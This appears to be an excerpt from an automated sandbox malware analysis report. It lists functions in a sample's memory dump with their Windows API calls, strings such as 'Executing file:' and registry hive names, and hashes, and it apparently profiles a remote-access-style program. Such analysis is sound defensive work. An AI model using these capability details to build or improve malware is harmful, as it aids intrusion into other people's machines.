                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V01@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@EventLocalTimeV10@V10@@sprintf
                                                • String ID: { %04i/%02i/%02i %02i:%02i:%02i - $! }$6E@
                                                • API String ID: 2138403969-3174467442
                                                • Opcode ID: 4212139c2ba697d7c1cc3f09a7e07344213188a0f76318f017da0797201d46c4
                                                • Instruction ID: 8005025bd8c273505e3c9a65872854300bf88ba1ebe0975787988bf1f48a70c6
                                                • Opcode Fuzzy Hash: 4212139c2ba697d7c1cc3f09a7e07344213188a0f76318f017da0797201d46c4
                                                • Instruction Fuzzy Hash: AE11BB76810118ABCB10EF94DD499EE77BCBF08706F044466F916E2091EB789B54CBA8
                                                Function 004035C3 Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004035D1
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004035DA
                                                • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 004035F2
                                                • _itoa.MSVCRT ref: 004035F9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 0040360F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403617
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00403626
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00403633
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040363F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403648
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403651
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040365A
                                                • lstrlenA.KERNEL32(00000000), ref: 00403661
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403677
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403680
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403689
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                                • String ID:
                                                • API String ID: 3966177967-0
                                                • Opcode ID: 663fa8b8a6ec807316df7492437e775b59779d2a15f813b0add2d516d28a05bb
                                                • Instruction ID: d073208daacaf083e6f908d4573932eefcae0e0ecabc17b3809a609b7c55694a
                                                • Opcode Fuzzy Hash: 663fa8b8a6ec807316df7492437e775b59779d2a15f813b0add2d516d28a05bb
                                                • Instruction Fuzzy Hash: BA21AB7580010AABCB05EFA0ED4D9DE7B7CFF14306B1085A5E502E21A0EB34AB09CB99
                                                Function 0040C8AB Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000001), ref: 0040C8C7
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8DE
                                                  • Part of subcall function 004031ED: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                  • Part of subcall function 004031ED: FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                  • Part of subcall function 004031ED: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60 ref: 0040C8EF
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002), ref: 0040C903
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Viewing directory: ,00000000,?,?,?,00000000), ref: 0040C921
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Viewing directory: ,00000000,?,?,?,00000000), ref: 0040C932
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C946
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040C952
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$V01@@$?c_str@?$basic_string@?length@?$basic_string@V10@0@$?begin@?$basic_string@D@1@@V10@V10@@$??2@?end@?$basic_string@?substr@?$basic_string@FileFindFirstG@1@@LocalTimeV12@printf
                                                • String ID: Viewing directory: $[INFO]
                                                • API String ID: 2683583397-80754294
                                                • Opcode ID: c2fdd0973ec038eb2b16a76fcb8cdd0ccebb7a4ad68b87cfb777c0cc42f40bc8
                                                • Instruction ID: c2637d771b6f838de205ffb07b2a30835328d388bf29d0478d1fd1f2991b9968
                                                • Opcode Fuzzy Hash: c2fdd0973ec038eb2b16a76fcb8cdd0ccebb7a4ad68b87cfb777c0cc42f40bc8
                                                • Instruction Fuzzy Hash: 252124B1910118ABDB04FFA1DC5ACEE773CFB54306B00456EF407A20A1EE385B48CB69
                                                Function 00412572 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041259F
                                                • GetCursorPos.USER32(?), ref: 004125CA
                                                • SetForegroundWindow.USER32(?), ref: 004125D3
                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 004125EE
                                                • Shell_NotifyIconA.SHELL32(00000002,00419F40), ref: 0041263F
                                                • ExitProcess.KERNEL32 ref: 00412647
                                                • CreatePopupMenu.USER32 ref: 0041264F
                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 00412664
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                • String ID: Close
                                                • API String ID: 1657328048-3535843008
                                                • Opcode ID: 07cc142423b92cce254e2ba837425b4beaa2f47aa8e56c34687c18e4c73bc50a
                                                • Instruction ID: b64edb8b230861bbc6bd5f98f9203ddfac84d62c0cd7e38c9debbe5d0937b7a5
                                                • Opcode Fuzzy Hash: 07cc142423b92cce254e2ba837425b4beaa2f47aa8e56c34687c18e4c73bc50a
                                                • Instruction Fuzzy Hash: 8E21B031554209BFDF129FA4EE19FDA3B65BB08702F148021F606E41B4C7B99EA1EB1D
                                                Function 0040B0F8 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM), ref: 0040B10B
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU), ref: 0040B123
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B17B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B188
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                                • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                                • API String ID: 2054586871-62392802
                                                • Opcode ID: ddbe727225fe3250553afca47930a8f90b23b0693e95b4045bffe2da25a6afca
                                                • Instruction ID: e528408bdf03fee8e26bfd667a3a7576b6915d88ab8ed4363d0bc42bf75596c0
                                                • Opcode Fuzzy Hash: ddbe727225fe3250553afca47930a8f90b23b0693e95b4045bffe2da25a6afca
                                                • Instruction Fuzzy Hash: A201653E99022AA2CF04AAD0EC25AD53718DF017E2F24407BAD04BB5C1CB3C998687CD
                                                Function 0040E6BB Relevance: 19.6, APIs: 13, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0040E6D3
                                                • IsWindowVisible.USER32(?), ref: 0040E6DC
                                                • sprintf.MSVCRT ref: 0040E704
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040E71B
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00414A54,?,00414A60), ref: 0040E743
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00414A60), ref: 0040E750
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00414A60), ref: 0040E75D
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00414A60), ref: 0040E76B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E774
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E77D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E786
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E78F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00414A60), ref: 0040E798
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$D@2@@0@Hstd@@V10@V?$basic_string@$??0?$basic_string@Window$?c_str@?$basic_string@?length@?$basic_string@D@1@@G@1@@TextV01@V01@@VisibleY?$basic_string@sprintf
                                                • String ID:
                                                • API String ID: 3824165999-0
                                                • Opcode ID: 5324b5352426dfef4bf080be73a50e55f3f2aab2f427d74537ac98df6a10865f
                                                • Instruction ID: d601ed5e0296fe8f8445ded5789e739f9ef6fb3142b1abebd212a00d938c4586
                                                • Opcode Fuzzy Hash: 5324b5352426dfef4bf080be73a50e55f3f2aab2f427d74537ac98df6a10865f
                                                • Instruction Fuzzy Hash: 6F21A976D0010DABCF05EFA0EC499DE7B7CAF04709B108166F516E60A1EA789799CB98
                                                Function 0040C960 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 0040C97E
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040C98B
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 0040C9AC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 0040C9BD
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
